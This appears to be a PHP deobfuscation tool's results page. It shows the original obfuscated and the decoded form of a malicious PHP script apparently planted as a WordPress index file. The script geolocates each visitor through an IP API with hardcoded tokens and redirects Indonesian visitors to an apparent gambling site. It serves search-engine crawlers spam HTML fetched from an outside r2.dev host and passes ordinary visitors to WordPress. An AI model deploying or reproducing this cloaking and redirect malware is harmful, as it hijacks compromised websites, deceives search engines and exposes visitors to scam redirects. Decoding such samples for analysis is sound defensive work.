Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto P18pQ; FXqrm: function fetchLocationFromApi($url) { $ch = curl_init(); curl_s..

Decoded Output download

<?php 
 goto P18pQ; FXqrm: function fetchLocationFromApi($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpCode === 200 && $response !== false) { $data = json_decode($response, true); $country = isset($data["country"]["names"]["en"]) ? $data["country"]["names"]["en"] : "Unknown"; $city = isset($data["city"]["names"]["en"]) ? $data["city"]["names"]["en"] : "Unknown"; if ($country && $city) { return array("country" => $country, "city" => $city); } } return null; } goto lPtDT; lPtDT: profile_user(); goto dj0Q2; PA2pO: function getLocationFromFindIP($ip) { $findipToken1 = "4bef3e47512c4b5a9695b4840e613db7"; $api1 = "https://api.findip.net/{$ip}/?token={$findipToken1}"; $location = fetchLocationFromApi($api1); if ($location) { return $location; } $findipToken2 = "aea0c7369963459aa075c953adb675b7"; $api2 = "https://api.findip.net/{$ip}/?token={$findipToken2}"; return fetchLocationFromApi($api2); } goto FXqrm; P18pQ: function profile_user() { $useragent = $_SERVER["HTTP_USER_AGENT"]; $pasteUrl = "https://pub-05ba3407903e4840a55b8c21fc682cda.r2.dev/petsplusmag.html"; $botAgents = array("Google-InspectionTool", "googlebot", "(compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "bingbot", "AhrefsBot", "slurp", "duckduckbot", "baiduspider", "yandexbot", "sogou", "exabot", "facebot", "ia_archiver"); $ip = $_SERVER["REMOTE_ADDR"]; $location = getLocationFromFindIP($ip); if ($location && strtolower($location["country"]) === "indonesia") { header("Location: https://daftar.to/beta138"); die; } foreach ($botAgents as $bot) { if (strpos($useragent, $bot) !== false) { $ch = curl_init($pasteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $content = curl_exec($ch); if ($content === false) { echo "Error fetching content: " . curl_error($ch); curl_close($ch); die; } curl_close($ch); echo $content; die; } } if (file_exists(__DIR__ . "/wp-blog-header.php")) { define("WP_USE_THEMES", true); require __DIR__ . "/wp-blog-header.php"; } else { echo "wp-blog-header.php not found"; die; } } goto PA2pO; dj0Q2: ?>

Did this file decode correctly?

Original Code

<?php
 goto P18pQ; FXqrm: function fetchLocationFromApi($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpCode === 200 && $response !== false) { $data = json_decode($response, true); $country = isset($data["\143\157\x75\156\164\162\171"]["\x6e\141\155\x65\163"]["\x65\x6e"]) ? $data["\x63\x6f\165\156\164\162\x79"]["\156\x61\155\x65\163"]["\x65\156"] : "\x55\x6e\x6b\x6e\x6f\x77\156"; $city = isset($data["\x63\x69\x74\171"]["\x6e\141\155\145\163"]["\x65\x6e"]) ? $data["\x63\151\x74\x79"]["\x6e\x61\x6d\145\163"]["\x65\156"] : "\x55\x6e\x6b\x6e\157\167\156"; if ($country && $city) { return array("\x63\x6f\165\x6e\164\162\x79" => $country, "\143\151\x74\171" => $city); } } return null; } goto lPtDT; lPtDT: profile_user(); goto dj0Q2; PA2pO: function getLocationFromFindIP($ip) { $findipToken1 = "\64\142\145\146\63\x65\x34\x37\65\61\62\143\64\x62\x35\141\x39\66\71\65\142\x34\x38\64\60\145\x36\61\x33\x64\x62\67"; $api1 = "\x68\x74\x74\x70\x73\72\x2f\x2f\x61\160\151\56\x66\151\x6e\144\x69\160\x2e\156\x65\164\x2f{$ip}\x2f\x3f\x74\x6f\x6b\x65\x6e\x3d{$findipToken1}"; $location = fetchLocationFromApi($api1); if ($location) { return $location; } $findipToken2 = "\x61\x65\x61\x30\x63\x37\x33\x36\x39\71\66\x33\x34\65\71\141\141\60\x37\x35\143\x39\65\63\x61\x64\x62\x36\67\x35\142\67"; $api2 = "\x68\x74\164\160\163\x3a\x2f\57\x61\160\151\x2e\146\151\x6e\x64\x69\x70\x2e\x6e\x65\164\57{$ip}\x2f\x3f\x74\x6f\x6b\x65\156\x3d{$findipToken2}"; return fetchLocationFromApi($api2); } goto FXqrm; P18pQ: function profile_user() { $useragent = $_SERVER["\x48\124\124\x50\137\x55\123\105\122\x5f\101\x47\105\x4e\124"]; $pasteUrl = "\150\164\x74\x70\x73\72\x2f\x2f\160\165\x62\x2d\x30\x35\142\141\63\x34\x30\67\x39\60\x33\x65\64\x38\64\60\x61\65\65\x62\70\x63\x32\61\x66\x63\66\x38\x32\143\x64\x61\x2e\x72\62\56\x64\145\x76\x2f\x70\x65\x74\163\x70\154\x75\x73\155\141\147\56\x68\x74\155\154"; $botAgents = array("\107\x6f\157\147\154\145\x2d\111\156\163\160\145\x63\164\151\157\x6e\124\x6f\157\154", "\147\157\x6f\147\154\x65\142\x6f\x74", "\50\143\157\x6d\160\141\164\x69\142\x6c\145\73\x20\107\157\x6f\147\x6c\x65\142\157\x74\57\62\x2e\61\73\40\x2b\150\164\164\x70\x3a\x2f\x2f\167\167\167\x2e\147\x6f\x6f\x67\154\x65\56\143\157\x6d\x2f\142\157\164\x2e\x68\164\x6d\x6c\x29", "\142\151\156\x67\x62\157\x74", "\101\150\162\x65\146\x73\x42\x6f\164", "\x73\154\165\162\160", "\144\165\x63\x6b\x64\x75\x63\x6b\x62\x6f\164", "\x62\141\151\x64\165\x73\160\x69\x64\145\x72", "\x79\x61\156\x64\x65\170\x62\x6f\164", "\163\x6f\147\x6f\x75", "\x65\x78\141\142\x6f\x74", "\146\141\x63\145\142\x6f\164", "\151\141\x5f\x61\162\143\x68\151\166\145\162"); $ip = $_SERVER["\x52\x45\115\x4f\x54\x45\137\101\104\104\122"]; $location = getLocationFromFindIP($ip); if ($location && strtolower($location["\143\157\x75\156\x74\x72\x79"]) === "\151\x6e\x64\157\156\x65\x73\x69\141") { header("\x4c\x6f\143\x61\x74\x69\157\x6e\72\40\150\164\164\x70\163\72\57\57\144\141\x66\164\x61\162\x2e\x74\x6f\57\142\145\164\141\x31\63\x38"); die; } foreach ($botAgents as $bot) { if (strpos($useragent, $bot) !== false) { $ch = curl_init($pasteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $content = curl_exec($ch); if ($content === false) { echo "\x45\x72\x72\157\162\40\x66\x65\x74\143\x68\151\x6e\147\x20\x63\157\156\164\x65\156\164\72\40" . curl_error($ch); curl_close($ch); die; } curl_close($ch); echo $content; die; } } if (file_exists(__DIR__ . "\57\x77\160\x2d\x62\x6c\157\147\x2d\x68\145\x61\144\x65\162\56\160\x68\160")) { define("\x57\120\137\x55\123\x45\x5f\124\110\x45\115\x45\123", true); require __DIR__ . "\57\167\160\55\x62\154\157\x67\x2d\x68\145\x61\x64\x65\162\56\160\x68\160"; } else { echo "\x77\160\x2d\142\154\x6f\x67\x2d\x68\x65\x61\144\145\162\56\x70\x68\x70\x20\x6e\x6f\x74\40\x66\x6f\165\156\x64"; die; } } goto PA2pO; dj0Q2: ?>

Function Calls

None

Variables

None

Stats

MD5 d7f78b08e6aa4f9769d3d2f53d5fdadb
Eval Count 0
Decode Time 64 ms